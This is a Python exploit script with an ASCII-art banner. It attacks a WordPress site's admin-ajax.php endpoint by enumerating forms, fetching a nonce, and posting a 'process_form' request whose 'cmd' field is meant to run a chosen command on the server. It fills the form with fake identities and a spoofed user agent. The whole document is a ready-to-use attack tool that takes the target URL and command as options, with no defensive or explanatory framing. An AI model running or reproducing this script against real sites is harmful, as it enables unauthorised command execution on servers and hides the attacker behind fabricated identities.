import requests from faker import Faker from urllib.parse import urlparse import time import sys import click requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) banner = r""" .=+*+++- =#***#**##.:-. -#**#####*#*.: :#*#%@#+#@%#.- =##*%##***#%=**#*=-. ***#*%#%#####*****+*= -#%*############*=***+*+- :%%#***#####*****#@#*#*#***+=: .=#####**#*******#%%%####*******+-. :*##%###*#*#%%##***%%%%%%%#**********#*+- :*#******##%#####%%%%##***#%%%##***********: =###****#***#***##*##********#%%%%#*********** :#********#**#*+*##*###**###+**###%%%%###****#**. +#*********%***===++#+*##*=+=====+*##==*##%%%%#- .=*#####***#%%%#**++===+++#*+++++++=++*## ::: :-*********##*=%%%#=++++++*++++++=====++++%%: :=*#*********##- :%%%#+======================#%#. =*##*********#*. .#%%%*+======================+#%* .-+*##********#%#. .*%%#*+========+++++++=========##%*: :*******#***##%#= :*%%%%**+=======================+***%%#=:::::-===========--: .#***#*###**##%%%+=+#%%%%%%##*====================+*###%%%%%%#########***********=. -*+=++=+*==+*+*%#****###%%%%%%%%#***##*****#####*#%%%%%%%#%************************* .*#==+==+==+##+=******###*#####%%%%%%%%%%%%%%%%%%%####*******###********************#= :*#+=*==*==**#++#*********##*******######%%####*************##*****#***************##* .##*#==*+=*=+#*##**************************#*==+++++*+*****************************#%%* .#%%##**+*#*#*#******************************#+=====++++**#****************#***####%%%#. :*%%%%%#*#***********************************#+=++===+***+****#####***#####**##%%%%%#=. -%%%%%####***********************************++++==++*+*######*############%#%###*= .::-*+*+#%%#*##******+*##*#####*---...::=*+++##***+*++=---:=+:++-%*==+--:.: . . ..--:-==--: .:+##+-. """ class ExploitScript: def __init__(self, url: str, cmd: str): self.url = url self.cmd = cmd self.form_id = None @staticmethod def display_banner() -> None: print(banner) @staticmethod def spinner(duration=10, interval=0.1) -> None: spinner_chars = ["|", "/", "-", "\\"] end_time = time.time() + duration while time.time() < end_time: for char in spinner_chars: sys.stdout.write(f"\r[{char}] Exploit loading, please wait...") sys.stdout.flush() time.sleep(interval) print("") def get_base_url(self) -> str: parsed_url = urlparse(self.url) return f"{parsed_url.scheme}://{parsed_url.netloc}" def fetch_form_id(self) -> None: base_url = self.get_base_url() req_url = f"{base_url}/wp-admin/admin-ajax.php" data = {"action": "form_search"} response = requests.post(req_url, data=data) if response.status_code == 200: form_data = response.json() ids = [item["id"] for item in form_data] names = [item["name"] for item in form_data] print("[+] Available Forms:") for id, name in zip(ids, names): print(f" {id}: {name}") self.form_id = input("[+] Select Form ID >>> ").strip() else: print(f"[-] Failed to fetch forms: {response.status_code}") exit(1) def fetch_nonce(self) -> str: base_url = self.get_base_url() req_url = f"{base_url}/wp-admin/admin-ajax.php" self.fetch_form_id() data = {"action": "form_nonce", "form_id": self.form_id} response = requests.post(req_url, data=data) if response.status_code == 200: nonce = response.json().get("data", "") print(f"[+] Nonce Retrieved: {nonce}") return nonce else: print(f"[-] Failed to fetch nonce: {response.status_code}") exit(1) def prepare_payload(self) -> dict: nonce = self.fetch_nonce() fake = Faker() payload = { "form_id": self.form_id, "nonce": nonce, "first_name": fake.first_name(), "last_name": fake.last_name(), "email": fake.email(), "action": "process_form", "cmd": self.cmd, } return payload def send_request(self) -> None: base_url = self.get_base_url() req_url = f"{base_url}/wp-admin/admin-ajax.php" payload = self.prepare_payload() headers = {"User-Agent": Faker().user_agent()} response = requests.post(req_url, data=payload, headers=headers) if response.ok: print("[+] Exploit delivered successfully.") else: print(f"[-] Exploit failed: {response.status_code}") @click.command() @click.option("--url", required=True, help="Target URL") @click.option("--cmd", default="/tmp/test", help="Command to execute") def main(url: str, cmd: str) -> None: exploit = ExploitScript(url, cmd) exploit.display_banner() exploit.spinner(duration=1) exploit.send_request() if __name__ == "__main__": main()